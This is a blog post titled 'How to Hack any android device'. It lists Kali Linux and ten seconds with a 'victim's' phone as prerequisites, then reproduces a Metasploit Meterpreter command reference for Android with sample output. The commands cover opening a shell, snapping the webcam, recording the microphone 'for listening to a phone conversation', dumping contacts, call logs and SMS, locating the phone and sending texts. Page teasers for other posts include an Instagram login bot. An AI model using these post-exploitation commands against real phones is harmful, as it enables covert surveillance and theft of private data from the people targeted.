Skip to main content

How to Hack any android device

   How to Hack any Android Device   


Prerequisites:



  • kali perating system
  • internet connection
  • victims mobile phone for 10 seconds

so if you want to know the steps i will update it soon here but till then you can watch the video here and the commands to control the victims mobile phone is below 

HAPPY HACKING !!





pwd:

The pwd command allows you to see the current directory you're in.
meterpreter > pwd
/data/data/com.metasploit.stage

cd:
The cd command allows you to change directory. For example:
meterpreter > cd cache
meterpreter > ls
cat:
The cat command allows you to see the contents of a file.
ls:
The ls command displays items in a directory. For example:
meterpreter > ls
Listing: /data/data/com.metasploit.stage/files
==============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  0     fil   2016-03-08 14:56:08 -0600  rList-com.metasploit.stage.MainActivity
upload:
The upload command allows you to upload a file to the remote target. The -r option allows you to do so recursively.
download:
The download command allows you to download a file from the remote target. The -r option allows you to do so recursively.
search:
The search command allows you to find files on the remote target. For example:
meterpreter > search -d . -f *.txt
ifconfig:
The ifconfig command displays the network interfaces on the remote machine.
meterpreter > ifconfig

...

Interface 10
============
Name         : wlan0 - wlan0
Hardware MAC : 60:f1:89:07:c2:7e
IPv4 Address : 192.168.1.207
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : fe80::62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954
IPv6 Netmask : ::

...
getuid
The getuid command shows the current user that the payload is running as:
meterpreter > getuid
Server username: u0_a231
ps
The ps command shows a list of processes the Android device is running. For example:
meterpreter > ps 

Process List
============

 PID    Name                                                         Arch  User
 ---    ----                                                         ----  ----
 1      /init                                                              root
 2      kthreadd                                                           root
 3      ksoftirqd/0                                                        root
 7      migration/0                                                        root
 8      rcu_preempt                                                        root
 9      rcu_bh                                                             root
 10     rcu_sched                                                          root
 11     watchdog/0                                                         root
 12     watchdog/1                                                         root
 13     migration/1                                                        root
 14     ksoftirqd/1                                                        root
 17     watchdog/2                                                         root
 18     migration/2                                                        root
 19     ksoftirqd/2                                                        root
 22     watchdog/3                                                         root
 23     migration/3                                                        root

...
shell
The shell command allows you to interact with a shell:
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0
To get back to the Meterpreter prompt, you can do: [CTRL]+[Z]
sysinfo
The sysinfo command shows you basic information about the Android device.
meterpreter > sysinfo
Computer    : localhost
OS          : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Meterpreter : java/android
webcam_list
The webcam_list command shows a list of webcams you could use for the webcam_snap command. Example:
meterpreter > webcam_list
1: Back Camera
2: Front Camera
webcam_snap
The webcam_snap command takes a picture from the device. You will have to use the webcam_list command to figure out which camera to use. Example:
meterpreter > webcam_snap -i 2
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg
record_mic
The record_mic command records audio. Good for listening to a phone conversation, as well as other uses. Example:
meterpreter > record_mic -d 20
[*] Starting...
[*] Stopped
Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav
activity_start
The activity_start command is an execute command by starting an Android activity from a URI string.
check_root
The check_root command detects whether your payload is running as root or not. Example:
meterpreter > check_root
[*] Device is not rooted
dump_calllog
The dump_calllog command retrieves the call log from the Android device.
dump_contacts
meterpreter > dump_contacts
[*] Fetching 5 contacts into list
[*] Contacts list saved to: contacts_dump_20160308155744.txt
geolocate
The geolocate commands allows you to locate the phone by retrieving the current lat-long using geolocation.
wlan_geolocate
The wlan_geolocation command allows you to locate the phone by retrieving the current lat-long using WLAN information. Example:
meterpreter > wlan_geolocate
[*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
[*] Google Maps URL:  https://maps.google.com/?q=30.*******,-97.*******
send_sms
The send_sms command allows you to send an SMS message. Keep in mind the phone will keep a copy of it, too.
meterpreter > send_sms -d "2674554859" -t "hello"
[+] SMS sent - Transmission successful
sms_dump
The sms_dump command allows you to retrieve SMS messages. And save them as a text file. For example:
meterpreter > dump_sms
[*] Fetching 4 sms messages
[*] SMS messages saved to: sms_dump_20160308163212.txt

...

$ cat sms_dump_20160308163212.txt

=====================
[+] SMS messages dump
=====================

Date: 2016-03-08 15:30:12 -0600
OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Remote IP: 192.168.1.207
Remote Port: 59130

#1
Type : Incoming
Date : 2016-03-08 15:29:32
Address : **********
Status : NOT_RECEIVED
Message : Hello world

...

run
The run command allows you to run a post module against the remote machine at the Meterpreter prompt. For example:
meterpreter > run post/android/capture/screen 

Comments

Popular posts from this blog

Is it worth buying Gautam Kumawat Hacking course

   Is it Worth buying Gautam Kumawat Course    so if you just want answer then i must say no, it is never worth it, if you want to know the reason keep reading. so i am talking here about the course of Gautam Kumawat his ads is currently running on different social media including youtube. Ad showing to join the free webinar on hacking. So when you join the webinar first he introduce himself in the way that you started thinking that he is a great  hacker by introducing his achievements and news articles and many more things. But let me tell you that these things is not very big for a skilled hacker, absolutely he is a great hacker but  we are here to talk about his course.  So after the introduction to the basic hacking and on how and what to learn on hacking he will ask you is you will be able to learn all these things within 45 days. Let me tell you that hacking is so vast that no one will be able to teach you complete hacking in jus...

Instagram Automation

Instagram Automation from selenium import webdriver import time class Instabot: def __init__ ( self , username , password): self .username = username self .password = password self .driver = webdriver.Chrome() self .driver.get( "http://www.instagram.com" ) self .driver.implicitly_wait( 5 ) self .driver.find_element_by_name( "username" ).send_keys(username) self .driver.find_element_by_name( "password" ).send_keys(password) self .driver.find_element_by_xpath( '//*[@id="react-root"]/section/main/article/div[2]/div[1]/div/form/div[4]/button/div' ).click() self .driver.implicitly_wait( 5 ) self .driver.find_element_by_xpath( '/html/body/div[4]/div/div/div[3]/button[2]' ).click() self .driver.get( "https://www.instagram.com" + "/explore/people/" ) dimension = self .driver.get_window_size() ...

How to Start With Hacking

How to start with hacking Everything discuss here is for ethical hacking not for any illegal or unethical hacking  topics discussed here are: Types of hacking jobs on hacking what to do on jobs how to start with hacking where to start Types and jobs on hacking First you need to know for what you want to learn hacking their are 2 types of hacking first one is defensive and second one is offensive further it is divided into black white and grey hat hackers also but that is different thing In offensive hacking you will have to perform hacking on different websites and if you find any vulnerability you have to report it to the owner of website (this is the thing hackers do on bug bounty program) if you are on any company for which you are hacking you have to submit the report to the analyst or hunter ( hunter is the high post in the field of hacking) in defensive hacking you need to learn networking and all and you have to make sure that the company f...